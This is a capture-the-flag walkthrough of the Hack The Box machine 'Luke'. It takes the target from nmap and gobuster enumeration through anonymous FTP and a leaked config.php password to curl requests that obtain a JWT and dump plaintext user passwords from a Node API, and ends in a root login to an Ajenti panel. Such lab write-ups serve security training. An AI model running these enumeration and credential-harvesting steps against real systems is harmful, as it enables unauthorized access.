Summary

  • On FTP, there is a message hinting that I need a source file for the web application
  • By running a gobuster, I can find all the directories and pages
  • I use the credentials found to authenticate with the api
  • Using the api I can list the credentials for users in plaintext
  • Navigating to the /management directory I can log in with one of the users found
  • I grab the root password from the config.json file
  • Lastly, I log in as root into the Ajenti Admin panel, get a terminal and get the flags

First start with an nmap scan

# Nmap 7.70 scan initiated Sun May 26 22:29:22 2019 as: nmap -sV -sC -T4 -oN LukeNmap 10.10.10.137
Nmap scan report for 10.10.10.137
Host is up (0.087s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3+ (ext.1)
| ftp-anon: Anonymous FTP login alloId (FTP code 230)
|_drwxr-xr-x    2 0        0             512 Apr 14 12:35 webapp
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.4
|      Logged in as ftp
|      TYPE: ASCII
|      No session upload bandwidth limit
|      No session download bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3+ (ext.1) - secure, fast, stable
|_End of status
22/tcp   open  ssh?
80/tcp   open  http    Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3
|_http-title: Luke
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
8000/tcp open  http    Ajenti http control panel
|_http-title: Ajenti

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 26 22:32:22 2019 -- 1 IP address (1 host up) scanned in 180.36 seconds


So there are a few ports open> First thing I did was check FTP because I saw the Anonymous login was enabled. First thing I noticed was that there was a text file located in webapp/. I copied the file onto my host machine so that I could read it.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r-xr-xr-x    1 0        0             306 Apr 14 12:37 for_Chihiro.txt
226 Directory send OK.

ftp> get for_Chihiro.txt
local: for_Chihiro.txt remote: for_Chihiro.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for for_Chihiro.txt (306 bytes).
226 Transfer complete.
306 bytes received in 0.87 secs (0.3433 kB/s)


Reading the file I can see a message that hints towards looking for source files

Dear Chihiro !!

As you told me that you wanted to learn web Development and Frontend, I can give you a little
push by showing the sources of the actual website I've created .
Normally you should know where to look but hurry up because I will delete them soon because of
our security policies !

Derry  


Now I decide to check out port 80 only to be greeted by a very basic webpage that doesn’t give me any useful information.

Now it was time to run a gobuster.

gobuster dir -u http://10.10.10.137 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt -t 20

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.137
[+] Threads:        20
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2019/09/16 12:57:24 Starting gobuster
===============================================================
/login.php (Status: 200)
/member (Status: 301)
/management (Status: 401)
/css (Status: 301)
/js (Status: 301)
/vendor (Status: 301)
/config.php (Status: 200)
/LICENSE (Status: 200)


Navigating to /config.php I am given some credentials to what looks like a SQL database

$dbHost = 'localhost';
$dbUsername = 'root';
$dbPassword = 'Zk6heYCyv6ZE9Xcg';
$db = "login";
$conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die("Connect failed: %s\n". $conn -> error);


Now, going to port 3000 will reveal a NodeJS app running that tells me I need an Auth token. This means that I will have to use JWT tokens

Running a gobuster on the NodeJS page will reveal some useful directories that are necessary to craft the HTTP request

gobuster dir -u http://10.10.10.137:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt -t 20
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.137:3000
[+] Threads:        20
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2019/09/16 13:37:26 Starting gobuster
===============================================================
/login (Status: 200)
/users (Status: 200)
/Login (Status: 200)
/Users (Status: 200)

Using This article, and the credentials I found earlier I was able to get an Auth token using curl

curl -X POST http://10.10.10.137:3000/login -H 'Content-Type: application/json' -d '{"username":"admin","password":"Zk6heYCyv6ZE9Xcg"}'


If you did everything Int right then it should output an Auth token

{"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4NjU2MTgwLCJleHAiOjE1Njg3NDI1ODB9.msKF4DP_76XRz5ycCkfP8LjySR8issMSUWbxPF6p97U"}


Now I construct another curl command using the auth token

curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4NjU2NjM3LCJleHAiOjE1Njg3NDMwMzd9.VEVnCgx1yQrhXDFIHBULGEj8n90nFH5_piQAJYYQkdA' http://10.10.10.137:3000


I get a message that outputs

{"message":"Ilcome admin ! "}


Now if I send the same request only this time to the users directory I get a list of users

curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4NjU2NjM3LCJleHAiOjE1Njg3NDMwMzd9.VEVnCgx1yQrhXDFIHBULGEj8n90nFH5_piQAJYYQkdA' http://10.10.10.137:3000/users
[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]


Now to get the passwords for each user you would have to simply send another GET request to /users/</b>

{"name":"Admin","password":"WX5b7)>/rp$U)FW"}
{"name":"Derry","password":"rZ86wwLvx7jUxtch"}
{"name":"Yuri","password":"bet@tester87"}
{"name":"Dory","password":"5y:!xa=ybfe)/QD"}


With all these credentials I basically just checked to see if any of them would work with any of the login pages or ssh and eventually there was one that worked. I could log in as Derry in the /management page.

Once logged in, there will be some files

Looking through the config.json file, you should see a password towards the middle of the page

Using the username root and password KpMasng6S5EtTy9Z I are able to log into the Ajenti console that is running on port 8000.

I am greeted with the Ajenti dashboard. On the left hand side there is an option to use the Terminal. Click on that and then add a new Terminal. Once in the terminal, if you do a quick whoami then you will see that I are root and can grab the flags.


You can find the user flag in /home/derry/user.txt and the root flag in /root/root.txt.